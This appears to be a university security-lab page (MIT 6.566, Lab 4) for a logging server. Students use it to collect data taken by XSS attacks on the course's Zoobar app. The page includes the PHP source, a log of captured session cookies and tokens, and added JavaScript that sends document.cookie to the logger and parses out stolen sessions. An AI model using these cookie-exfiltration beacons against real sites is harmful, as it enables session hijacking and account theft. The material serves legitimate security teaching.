Lab 4 Logging Script

You can use this server-side script to exfiltrate data from client-side JavaScript: a script running in the victim's browser requests an image from this server, and the server logs whatever the request's query string contains. For example, clicking this client-side hyperlink will cause the server to log the payload:

(new Image()).src='https://css.csail.mit.edu/6.566/2024/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();

The random argument is ignored by the server, but a query string that differs on every request ensures that the browser bypasses its cache when downloading the image (a cached image means no request, and so no log entry). We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding. Two caveats follow from the script's source below: percent-encode the payload (for example with encodeURIComponent), because characters such as '#', '&' or ';' in a raw cookie value are URL syntax and would truncate or split what the server receives; and the server rejects any request whose id or payload exceeds 1000 bytes, whose payload is empty, or whose exact payload was already logged within the last 5 seconds, and it replaces newlines in logged values with '.'.
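An added example (not code from the lab page) showing why the payload should be percent-encoded and how to fit a multi-line script into a javascript: link. It assumes only the endpoint and the id/payload/random parameters described above; the helper names and the sample cookie value are made up for illustration, and the WHATWG URL parser stands in for what the browser sends and what PHP's $_REQUEST decodes.

```javascript
// Added example (not part of the lab page). Helper names and the sample
// cookie are made up; the endpoint and its id/payload/random parameters
// are the ones documented on the page.
const LOG_URL = 'https://css.csail.mit.edu/6.566/2024/labs/log.php';

// The URL the Image() technique should request. encodeURIComponent matters:
// a stolen cookie such as "PyZoobarLogin=grader#abc123" contains '#', '=',
// and often ';' or '&', all of which are URL syntax when sent raw.
function buildLogUrl(id, payload, rand = Math.random()) {
  return LOG_URL + '?id=' + encodeURIComponent(id) +
         '&payload=' + encodeURIComponent(payload) +
         '&random=' + rand;
}

// The page's snippet with the value concatenated raw, for comparison.
function naiveLogUrl(id, payload, rand = Math.random()) {
  return LOG_URL + '?id=' + id + '&payload=' + payload + '&random=' + rand;
}

// Model of what log.php gets in $_REQUEST['payload'] for a given URL: the
// browser never sends the fragment (everything from the first '#'), and the
// server percent-decodes the query string.
function serverSeesPayload(url) {
  return new URL(url).searchParams.get('payload');
}

// javascript: URLs cannot contain literal newlines. Percent-encoding the whole
// script keeps it on one line; the browser decodes it before running it.
function toJavascriptHref(script) {
  return 'javascript:' + encodeURIComponent(script);
}

// Constructed sample value in the shape seen in the lab's logged entries.
const sampleCookie = 'PyZoobarLogin=grader#abc123';

// A multi-line exfiltration script for the link (encodes document.cookie).
const exfilScript = `(new Image()).src = '${LOG_URL}?id=my-username'
  + '&payload=' + encodeURIComponent(document.cookie)
  + '&random=' + Math.random();`;

const link = toJavascriptHref(exfilScript);

console.log(buildLogUrl('my-username', sampleCookie));
console.log('server sees (encoded):', serverSeesPayload(buildLogUrl('me', sampleCookie)));
console.log('server sees (raw):    ', serverSeesPayload(naiveLogUrl('me', sampleCookie)));
console.log(link);
```

With the raw concatenation, everything from the '#' in the cookie becomes the URL fragment: the server logs only "PyZoobarLogin=grader" and never sees the random cache-buster either. The encoded form arrives intact.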

Test form

If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)


ID: your-mit-username (some identifier to locate your payload in the log)

Payload: some-string (the information you stole)

[Log]

Logged entries

Below are the most recent logged entries, so that you can check if your attack worked:

Thu, 27 Nov 2025 03:32:24 +0000: student-vm: PyZoobarLogin=User2#5deb7bd681a6ca0aeaac6e84b6f0fe251dc13b865c76b05feb33e36c75bb13f3
Sun, 23 Nov 2025 17:43:03 +0000: student-ex8: grader/ZOWBWEVKGPOM
Sun, 23 Nov 2025 17:42:57 +0000: student-ex8: grader/SQCRGLXJOYRA
Sun, 23 Nov 2025 17:42:38 +0000: student-ex5: PyZoobarLogin=grader#1b9325f8009f75974f431b6e4140f50023c90fb69a72d6f4cf2660e3841bc36c
Sun, 23 Nov 2025 17:42:32 +0000: student-ex4: PyZoobarLogin=grader#9ef9a697df647f1ac5ceefe9dfcc833f878a6c8d993be203909c648a73a6dd53
Sun, 23 Nov 2025 17:42:21 +0000: student-lab4: PyZoobarLogin=grader#d40a82d8eb3333802d4ba0d763f24f21a6bfc6fbdb4ea5a6ca65dda5e15a23f1
Sun, 23 Nov 2025 17:31:56 +0000: student-ex8: grader/HCBEOYZAOQTW
Sun, 23 Nov 2025 17:31:50 +0000: student-ex8: grader/XSRKCCQMINYS
Sun, 23 Nov 2025 17:31:32 +0000: student-ex5: PyZoobarLogin=grader#c016f877c9806b33ff6fdf94ce194dbd19bf508cd6267942790fca33aedfe736
Sun, 23 Nov 2025 17:31:26 +0000: student-ex4: PyZoobarLogin=grader#85b127a02d974d810ab5f97d666c4a87e5a2dd0ad6161e8c0f2e90777e6560e7
Sun, 23 Nov 2025 17:31:14 +0000: student-lab4: PyZoobarLogin=grader#9b1668e3ea4c485cb94c0d101a63cce8c65517597d71ca9490f3f40939b4b3a0
Sun, 23 Nov 2025 17:26:32 +0000: student-ex8: grader/TWNSILJXAWXS
Sun, 23 Nov 2025 17:26:13 +0000: student-ex5: PyZoobarLogin=grader#339085f0256be58ab4f2c8b3c1c800a4f2067a771f5e963346b4ba3b6544c35f
Sun, 23 Nov 2025 17:26:06 +0000: student-ex4: PyZoobarLogin=grader#5ade355fc0aa3299538715c5182f25c2070f42f2e6f21ec194f8fec8e288323e
Sun, 23 Nov 2025 17:25:52 +0000: student-lab4: PyZoobarLogin=grader#dbaabbec58bea588855c2443fe19bbec1797c612bf78a5980798fb001e1a29c0
Sun, 23 Nov 2025 17:22:33 +0000: student-ex8: grader:BSDBJUXOXGFZ
Sun, 23 Nov 2025 17:22:15 +0000: student-ex5: PyZoobarLogin=grader#e46bce23f05a46eac5c5dd1f0a6f765e668d4e14823573b12b19fbf03af6a12a
Sun, 23 Nov 2025 17:22:09 +0000: student-ex4: PyZoobarLogin=grader#a0e6ffbc7afaff8c08f44655cf399ddc3fb011b9d1c449f58ef143d95b8ba14a
Sun, 23 Nov 2025 17:21:57 +0000: student-lab4: PyZoobarLogin=grader#77c93b91d2aad06c52ebb5c639f990800b01d33e0283a034d58cd17a7c35300a
Sun, 23 Nov 2025 17:18:06 +0000: student-ex5: PyZoobarLogin=grader#1833bcddbb255abb4e3c8b877f2bb38c0b8f656bb48e206c6b5fdd9d8ebd76f8
Sun, 23 Nov 2025 17:18:00 +0000: student-ex4: PyZoobarLogin=grader#6cbf8202374b19ca133a9fb95430bfc0da085fe98c7a380dfdb716d2d44bac95
Sun, 23 Nov 2025 17:17:48 +0000: student-lab4: PyZoobarLogin=grader#083a5785458a302bb86297ae85f3bda8548d7dac34e604fd95d6b443ca286b64
Sun, 23 Nov 2025 17:13:09 +0000: student-ex5: PyZoobarLogin=grader#7a346b2a4467dd52bedf1a7152a822aed7509fe88adb7211b8691c89364fc3b4
Sun, 23 Nov 2025 17:13:03 +0000: student-ex4: PyZoobarLogin=grader#ba85c50b1ba42d53a5d241d2475da68f7dbcc4d28c0338c6572975a37dbbf93c
Sun, 23 Nov 2025 17:12:51 +0000: student-lab4: PyZoobarLogin=grader#1b3a59fde993d165ed63cfaf98493e44af45681ff22144f1927b2b7a48394b31
Sun, 23 Nov 2025 17:08:13 +0000: student-ex5: PyZoobarLogin=111#bbde9e11ab8f8c22cd9942aa64a431f763e40db59a3ce2271f361ebdc9749a6e
Sun, 23 Nov 2025 16:55:58 +0000: student-ex5: PyZoobarLogin=111#bbde9e11ab8f8c22cd9942aa64a431f763e40db59a3ce2271f361ebdc9749a6e
Sun, 23 Nov 2025 16:53:47 +0000: student-ex5: PyZoobarLogin=111#bbde9e11ab8f8c22cd9942aa64a431f763e40db59a3ce2271f361ebdc9749a6e
Sun, 23 Nov 2025 16:46:57 +0000: student-ex5: PyZoobarLogin=grader#7b0efcc249bc2ce5e17cb6df3fdca10bd890cf52669f45503e6671fc549bcffd
Sun, 23 Nov 2025 16:46:51 +0000: student-ex4: PyZoobarLogin=grader#8e7e474bdae05f70a5177bdbdb8ea313c42b43a72926cd5f6b72751339e0ccad
Sun, 23 Nov 2025 16:46:38 +0000: student-lab4: PyZoobarLogin=grader#a9a8e1354ef6ed7fb9dd527f90eda8e1b9037ffee7e3bffb3d4f9d91363ee2ab
Sun, 23 Nov 2025 16:39:44 +0000: student-ex5: PyZoobarLogin=111#cd1fa6be76db6ef92cacc4210bc59215194a8a05bd25a538b876df026854d21a
Sun, 23 Nov 2025 16:39:36 +0000: student-ex5: PyZoobarLogin=111#cd1fa6be76db6ef92cacc4210bc59215194a8a05bd25a538b876df026854d21a
Sun, 23 Nov 2025 16:38:24 +0000: student-ex5: PyZoobarLogin=grader#7ed6c674ea87d143e3ff6e2e9ed8c2746d400d71fa0ee6474d66e4814f5282fa
Sun, 23 Nov 2025 16:38:19 +0000: student-ex4: PyZoobarLogin=grader#231eedcf1e3e0f5d6e01c13f219363899c992c6968f74cb7362eb01714e64aec
Sun, 23 Nov 2025 16:38:07 +0000: student-lab4: PyZoobarLogin=grader#f8debab336a5b3b29b360f250420ab02e671eeda738749055592b0e51a5cec80
Sun, 23 Nov 2025 16:36:56 +0000: student-ex5: PyZoobarLogin=grader#c499e39ce2bfd5f6d0c6153ae1f1ab849d5409942de66b561ab2818514f20d3e
Sun, 23 Nov 2025 16:36:50 +0000: student-ex4: PyZoobarLogin=grader#705b9ddc2ed1dde6efc7ff05ee6cba2cb87cc5604100ecbcbd08823d7d24256f
Sun, 23 Nov 2025 16:36:39 +0000: student-lab4: PyZoobarLogin=grader#7d1e3e9f300da0e45b6a39a1501f22d4b93ad8b9339e36681387d64067d2bcb3
Sun, 23 Nov 2025 16:35:18 +0000: student-ex5: PyZoobarLogin=111#857f52849d3882aec97deffb603462b52dda31f65162f9f39127d279f8d84752
Sun, 23 Nov 2025 16:35:08 +0000: student-ex5: PyZoobarLogin=111#857f52849d3882aec97deffb603462b52dda31f65162f9f39127d279f8d84752
Fri, 21 Nov 2025 08:26:10 +0000: attacker: grader/DYLETNNLLGVE
Fri, 21 Nov 2025 08:26:02 +0000: attacker: grader/DDHJVYJYFLOI
Fri, 21 Nov 2025 08:25:06 +0000: attacker: grader/AGSPOJBECYTZ
Fri, 21 Nov 2025 08:24:58 +0000: attacker: grader/JGERTYWTYGZG
Fri, 21 Nov 2025 08:04:50 +0000: attacker: grader/CRPPRHBSGEJY
Fri, 21 Nov 2025 08:04:43 +0000: attacker: grader/MQTSDPMPUTKX
Fri, 21 Nov 2025 08:02:48 +0000: attacker: grader/KMNITNNDWYDQ
Fri, 21 Nov 2025 07:58:20 +0000: HatsuneMiku: PyZoobarLogin=grader#4eeaeadd192ee396881e5b31747b6e9886703dd8f4efbcce2134533fc35d5306
Fri, 21 Nov 2025 07:58:12 +0000: HatsuneMiku: PyZoobarLogin=grader#3005c1d801df608d96e49bdf07ef8766d3139c77ab75b483b8bb4e631edbbf30
Fri, 21 Nov 2025 07:57:58 +0000: HatsuneMiku: PyZoobarLogin=grader#274d98b7d4231f15745303f9dff025c4b85b85e45efefb18ebe6e422f662824d
Fri, 21 Nov 2025 07:54:38 +0000: HatsuneMiku: PyZoobarLogin=grader#fa2666e247bd9b3655ba927c7cf95bad9fd05aa95462a1a52d29a9e5de7fb74d
Fri, 21 Nov 2025 07:54:30 +0000: HatsuneMiku: PyZoobarLogin=grader#d40ace83b3416361814b5fb803b3626cb4dc4febe6174b6fb938fe88e7905517
Fri, 21 Nov 2025 07:54:15 +0000: HatsuneMiku: PyZoobarLogin=grader#efbd61a6753704fda5fc7356ac953f50b21fca2d9044e6e26e32f48b28022d5e
Fri, 21 Nov 2025 07:52:13 +0000: HatsuneMiku: PyZoobarLogin=grader#2f8c7ca95a057ad7d85454967ee3502e87429dbe432b5a174384c4a92f91013f
Fri, 21 Nov 2025 07:52:05 +0000: HatsuneMiku: PyZoobarLogin=grader#ade9d2caf6d5d81862b2ed7a4a255ac4051fa8d94e486c4429777f0dbb5d6002
Fri, 21 Nov 2025 07:51:51 +0000: HatsuneMiku: PyZoobarLogin=grader#e99a16a3e933aaa701025655e099b2b54dc283f3017e2516666f595b47f6d163
Fri, 21 Nov 2025 07:51:02 +0000: zjy: grader/MIETHYTENAQV
Fri, 21 Nov 2025 07:50:52 +0000: zjy: grader/MHCUIQWNFMSB
Fri, 21 Nov 2025 07:50:16 +0000: zjy: PyZoobarLogin=grader#2af30d89c79359397e2d43035f9c350eda0fa7b8e13efc13489a0c29f6c68d3d
Fri, 21 Nov 2025 07:50:06 +0000: zjy: PyZoobarLogin=grader#9cc10d186e35f75edd85d81c0c6c8fa5186a1a41739c2e450b4702428c0ddceb
Fri, 21 Nov 2025 07:49:43 +0000: testing: grader#9e021c2a2e9712b91c9b5525aa1c40338c10645b291897601f5caffa2e2ea3e6
Fri, 21 Nov 2025 07:46:53 +0000: zjy: grader/DUQETTRUOHFQ
Fri, 21 Nov 2025 07:46:41 +0000: zjy: grader/ULYVNZCSCREG
Fri, 21 Nov 2025 07:46:04 +0000: zjy: PyZoobarLogin=grader#846eaacba961814aaa6f0ad5a6d78c7aa3cddac3e2be4b2f86fe0dfdec549e6e
Fri, 21 Nov 2025 07:45:53 +0000: zjy: PyZoobarLogin=grader#b9adc007b30f7d01804428dd8f4cce7af5b21b99e2eaae2404d5e86f192ef1dd
Fri, 21 Nov 2025 07:45:32 +0000: testing: grader#483eca7be37de1d39704cb431f46e3a7c398c1a918291648af3bd1dd0b5531cd
Fri, 21 Nov 2025 07:41:09 +0000: HatsuneMiku: PyZoobarLogin=grader#770396282b801b3494cd6aaf8a690c4b817c094fa2317d925eebb0f5ceb758e8
Fri, 21 Nov 2025 07:41:01 +0000: HatsuneMiku: PyZoobarLogin=grader#b4ca31e2af63ac283a469a0e44d6dcb25080ee51631765ff36c56abad0000473
Fri, 21 Nov 2025 07:40:46 +0000: HatsuneMiku: PyZoobarLogin=grader#2c87d1f2f1a99716dad2fe16c6f21fcba709dabed24d41db42c75bfc5af8609b
Fri, 21 Nov 2025 07:40:04 +0000: HatsuneMiku: sidebar_state=false; PyZoobarLogin=admin#d189c573b775da1de7dcfe17f252127e53164834ad0ebf05f8eb3df345e9faed
Fri, 21 Nov 2025 07:36:38 +0000: HatsuneMiku: PyZoobarLogin=grader#7809041dc493fe830ead6e7cca067a264d225352de9d717ccf6a48cf042b7650
Fri, 21 Nov 2025 07:36:31 +0000: HatsuneMiku: PyZoobarLogin=grader#b449c4a4358c7f95a1ba904d83f47d3195e3c63c082bbb3b12eba7fe86b98d92
Fri, 21 Nov 2025 07:36:16 +0000: HatsuneMiku: PyZoobarLogin=grader#d3911fda548fca44475955774708a2816c2edc2fabcbd94b57c238e3550c4603
Fri, 21 Nov 2025 07:35:34 +0000: HatsuneMiku: sidebar_state=false; PyZoobarLogin=admin#e8f213664b6119058ac572956fee4616bcd5346eaf9e071c7cf1e2a8b3063fa0
Fri, 21 Nov 2025 07:29:34 +0000: HatsuneMiku: sidebar_state=false; PyZoobarLogin=admin#e8f213664b6119058ac572956fee4616bcd5346eaf9e071c7cf1e2a8b3063fa0
Fri, 21 Nov 2025 07:28:37 +0000: HatsuneMiku: PyZoobarLogin=grader#39ea75aafa85f90544cddaec6f91465adff79739a09444e03f589806a0ac4b86
Fri, 21 Nov 2025 07:28:30 +0000: HatsuneMiku: PyZoobarLogin=grader#e72bf03232be4e250734cc9c73ed5b5590ddc92a2ca48d1a435f1eca6fce9eab
Fri, 21 Nov 2025 07:28:13 +0000: HatsuneMiku: PyZoobarLogin=grader#bdabe7b8500875707734603169dd3e757ad61bb350c4be5c01c50bc48a0876e7
Fri, 21 Nov 2025 07:26:56 +0000: HatsuneMiku: PyZoobarLogin=grader#aa8c144a2c0f2d8b4b7fbfa3043565d24d9ca0476ebdc490a75a2995ba1498d2
Fri, 21 Nov 2025 07:26:49 +0000: HatsuneMiku: PyZoobarLogin=grader#7de52233f896b8fce8ae18e039f58fdccdb58d6cc73f8bd6947915b1b4bb4f81
Fri, 21 Nov 2025 07:26:36 +0000: HatsuneMiku: PyZoobarLogin=grader#a730ddc1d686497ea1f2350917c3d56f4fde2a11ca9de45ebf4cf934fba3f894
Fri, 21 Nov 2025 07:25:53 +0000: HatsuneMiku: sidebar_state=false; PyZoobarLogin=admin#f0dbfcf3bc74e150f34e5dbd3b95a166319a73a72a923a7c7614fc961438be73
Fri, 21 Nov 2025 07:25:51 +0000: student-vm: grader/HYQEZEHUECAX
Fri, 21 Nov 2025 07:25:43 +0000: must: grader/PSDCIKQHLFZL
Fri, 21 Nov 2025 07:25:12 +0000: must: PyZoobarLogin=grader#a9d66b1abba4d8a45758adba0d75140a1b0bfcd07a3c6a6b84d8714a78319ade
Fri, 21 Nov 2025 07:25:04 +0000: must: PyZoobarLogin=grader#af6c47960b921c6496678867595ee3abae42f5ea4e8a575042f427d2ee44570c
Fri, 21 Nov 2025 07:24:48 +0000: must: PyZoobarLogin=grader#d1c553aeb7166f153ee09c83849c9f92dac2ea381cb056428828b911339785fc
Fri, 21 Nov 2025 07:17:53 +0000: HatsuneMiku: sidebar_state=false; PyZoobarLogin=admin#f0dbfcf3bc74e150f34e5dbd3b95a166319a73a72a923a7c7614fc961438be73
Fri, 21 Nov 2025 07:17:31 +0000: HatsuneMiku: sidebar_state=false; PyZoobarLogin=admin#f0dbfcf3bc74e150f34e5dbd3b95a166319a73a72a923a7c7614fc961438be73
Fri, 21 Nov 2025 07:15:35 +0000: HatsuneMiku: sidebar_state=false; PyZoobarLogin=admin#f0dbfcf3bc74e150f34e5dbd3b95a166319a73a72a923a7c7614fc961438be73
Fri, 21 Nov 2025 07:13:57 +0000: HatsuneMiku: sidebar_state=false; PyZoobarLogin=admin#f0dbfcf3bc74e150f34e5dbd3b95a166319a73a72a923a7c7614fc961438be73
Fri, 21 Nov 2025 07:09:26 +0000: student: sidebar_state=false; PyZoobarLogin=admin#f0dbfcf3bc74e150f34e5dbd3b95a166319a73a72a923a7c7614fc961438be73
Fri, 21 Nov 2025 07:00:01 +0000: student: PyZoobarLogin=grader#14f1994b3cdd5c21e5adefa3f34506d8ac71ca7308a310f0faea27d09a28894e
Fri, 21 Nov 2025 06:59:54 +0000: HatsuneMiku: PyZoobarLogin=grader#25670af669b443091ab26c5273dc42acb45f078323ca14963c2fcd38a50abc2a
Fri, 21 Nov 2025 06:59:39 +0000: HatsuneMiku: PyZoobarLogin=grader#496428844a2f5f3948193220225bdbb95893f85b2cac7731ab4cf439ed1a7f68
Fri, 21 Nov 2025 06:57:54 +0000: student: PyZoobarLogin=grader#1a696e4aa4213b776940dab08ff6c341a6579d301734736a40649a55630d3e07
Fri, 21 Nov 2025 06:57:47 +0000: HatsuneMiku: PyZoobarLogin=grader#f17b7114021e66af727bb0d28cef31d055791b8137adb018d52a900789137964
Fri, 21 Nov 2025 06:57:33 +0000: HatsuneMiku: PyZoobarLogin=grader#16d77c289f1c8c673fb8c5153c94201785ea89bac0b359dad1a8a0c5614a428c
Fri, 21 Nov 2025 06:56:17 +0000: student: PyZoobarLogin=grader#c8459828376f12de3fc3047319d5c445e533ce0c422af62152cdd0a9703ee413
Fri, 21 Nov 2025 06:56:10 +0000: HatsuneMiku: PyZoobarLogin=grader#6947551a995635be8b7ca61d92e0fc3696266b0de1a4c4c1a84c9b192d0adbea
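An added example (not code from the lab page) for reading the shared log: it parses the entry format written by the script's source ("<RFC 2822 date>: <id>: <payload>", newest first), filters to one id, and pulls user#token session cookies out of a captured document.cookie string. The sample lines and the function names are constructed for illustration; the NAME=user#hextoken cookie shape is only what the logged entries above exhibit, not a documented format.

```javascript
// Added example (not part of the lab page). Parses the shared log in the
// format written by log.php ("<RFC 2822 date>: <id>: <payload>", newest
// first) and reports what a given id captured. Sample lines below are
// constructed, not real log data; the user#token cookie shape is simply
// what the logged entries on the page look like.
const SAMPLE_LOG = [
  'Thu, 27 Nov 2025 03:32:24 +0000: alice: PyZoobarLogin=User2#5deb7bd6',
  'Sun, 23 Nov 2025 17:43:03 +0000: bob: grader/ZOWBWEVKGPOM',
  'Sun, 23 Nov 2025 17:42:38 +0000: alice: sidebar_state=false; PyZoobarLogin=admin#d189c573',
  'Sun, 23 Nov 2025 17:42:32 +0000: alice: PyZoobarLogin=grader#9ef9a697',
  'this line is not a log entry',
].join('\n') + '\n';

// The date field itself contains ':' so match its RFC 2822 shape explicitly
// rather than splitting on ':'. The id is then everything up to the next
// ': ' and the payload is the rest of the line (newlines in either were
// already replaced by '.' server-side).
const LINE_RE = /^(\w{3}, \d{2} \w{3} \d{4} \d{2}:\d{2}:\d{2} [+-]\d{4}): (.*?): (.*)$/;

function parseLogLine(line) {
  const m = LINE_RE.exec(line);
  return m ? { date: m[1], id: m[2], payload: m[3] } : null;
}

function parseLog(text) {
  return text.split('\n').map(parseLogLine).filter(e => e !== null);
}

// The entries one student cares about: those logged under their own id.
function entriesFor(text, id) {
  return parseLog(text).filter(e => e.id === id);
}

// Split a captured document.cookie string ("a=b; c=d") and keep cookies
// whose value has the user#hextoken shape seen in the log.
function extractSessionCookies(payload) {
  const found = [];
  for (const part of payload.split(/;\s*/)) {
    const m = /^([^=]+)=([^#]*)#([0-9a-f]+)$/.exec(part);
    if (m) found.push({ name: m[1], user: m[2], token: m[3] });
  }
  return found;
}

// Distinct users whose session cookie was captured under the given id.
function capturedUsers(text, id) {
  const users = new Set();
  for (const e of entriesFor(text, id)) {
    for (const c of extractSessionCookies(e.payload)) users.add(c.user);
  }
  return [...users].sort();
}

for (const e of entriesFor(SAMPLE_LOG, 'alice')) {
  console.log(e.date, '->', extractSessionCookies(e.payload));
}
console.log('captured users for alice:', capturedUsers(SAMPLE_LOG, 'alice'));
```

Paste the "Logged entries" text into SAMPLE_LOG's place and change the id to your own to check which sessions your attack actually captured; entries with payloads that are not cookies (the grader/XXXX lines above) parse fine but yield no session cookies.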

Source code

In case you are curious, here is the source code of this page.

<?php
// Any origin may call this endpoint. An <img> request does not need CORS,
// but this lets fetch()/XMLHttpRequest-based payloads read the response too.
header("Access-Control-Allow-Origin: *");

do {
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }

    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }

    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }

    $payload = $_REQUEST['payload'];
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }

    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }

    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }

    // The log file is newline-delimited, so strip CR/LF from both values:
    // otherwise a payload could forge extra log entries (log injection).
    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);

    $file = fopen("/tmp/6.566-2024-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }

    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }

    // Keep the new entry first, followed by at most the 100 previous ones.
    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $line = fgets($file);
        if ($line === false) {
            break;   // EOF (or an empty file): nothing more to keep
        }
        $lines[] = $line;
    }
    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as $line) {
        fwrite($file, $line);
    }

    flock($file, LOCK_UN);
    fclose($file);

    echo "Logged!";
    return;
} while(0);

$link = "(new Image()).src="
      . "'https://css.csail.mit.edu/6.566/2024/labs/log.php?'"
      . " + 'id=my-username'"
      . " + '&payload=some-string' + '&random='"
      . " + Math.random()";
?><!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" type="text/css" href="labs.css" />
        <title>Lab 4 Logging Script</title>
    </head>
    <body>
        <h1>Lab 4 Logging Script</h1>
        <p>
            You can use this server side script to extract data from
            client-side JavaScript. For example, clicking this client-side
            hyperlink will cause the server to log the payload:
        </p>
        <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
        <p>
            The random argument is ignored, but ensures that the browser
            bypasses its cache when downloading the image. We suggest that you
            use the random argument in your scripts as well.  The ID argument
            will help you distinguish your log entries from those sent by other
            students; we suggest picking your MIT Athena username.  Newlines are not
            allowed in <tt>javascript:</tt> links; if this bothers you, try
            <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
        </p>

        <h2>Test form</h2>
        <p>
            If you just want to try out the script, you can use this form.
            (For your actual attacks in lab 4, you'll probably want to use the
            JavaScript image technique shown above.)
        </p>

        <form method="GET" action="">
            <label for="id">ID:</label><br />
            <input id="id" name="id" placeholder="your-mit-username" size="40" />
            <i>(some identifier to locate your payload in the log)</i>
            <br />
            <br />
            <label for="payload">Payload:</label><br />
            <input id="payload" name="payload" placeholder="some-string" size="40" />
            <i>(the information you stole)</i>
            <br />
            <input type="submit" value="Log" name="log_submit" />
        </form>

        <h2>Logged entries</h2>
        <p>
            Below are the most recent logged entries, so that you can check
            if your attack worked:
        </p>

        <pre class="tty"><?php
            // htmlspecialchars() keeps logged payloads from being rendered as
            // HTML (or script) when the log is displayed on this page.
            $lines = file_get_contents("/tmp/6.566-2024-logger.txt");
            echo htmlspecialchars($lines);
        ?></pre>

        <h2>Source code</h2>
        <p>In case you are curious, here is the source code of this page.</p>
        <pre><?php highlight_file(__FILE__); ?></pre>
    </body>
</html>